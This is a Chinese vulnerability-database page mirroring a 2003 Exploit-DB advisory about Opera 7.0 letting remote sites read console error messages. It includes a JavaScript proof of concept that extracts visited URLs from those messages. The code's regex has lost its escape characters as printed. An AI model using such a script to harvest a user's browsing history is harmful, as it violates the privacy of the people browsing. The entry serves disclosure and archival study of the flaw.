Opera 7.0 – Error Message History Disclosure

Opera 7.0 – Error Message History Disclosure

漏洞ID 1053714 漏洞类型
发布时间 2003-02-04 更新时间 2003-02-04
图片[1]-Opera 7.0 – Error Message History Disclosure-安全小百科CVE编号 N/A
图片[2]-Opera 7.0 – Error Message History Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22219
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6759/info

It has been reported that Opera fails to ensure that a remote site has proper authorization before executing some methods used to access error messages stored in the Opera console.

This issue is further exacerbated by the fact that error messages also contain the URL of the site that caused the issue. This can be exploited by a malicious attacker to obtain a listing of the victim user's Web browsing habits for, potentially, malicious purposes.

var sMsg,
sFinal="",
iLen=opera.errorIndex();

for (var iErr=0;iErr<iLen;iErr++) {
sMsg=opera.errorMessage(iErr);
if (sMsg && /(https?://S+)/i.test(sMsg)) sFinal+=RegExp.$1+"n";
}
alert(sFinal);

相关推荐: IRIX Systour and OutOfBox Vulnerabilities

IRIX Systour and OutOfBox Vulnerabilities 漏洞ID 1105165 漏洞类型 Access Validation Error 发布时间 1996-10-30 更新时间 1996-10-30 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享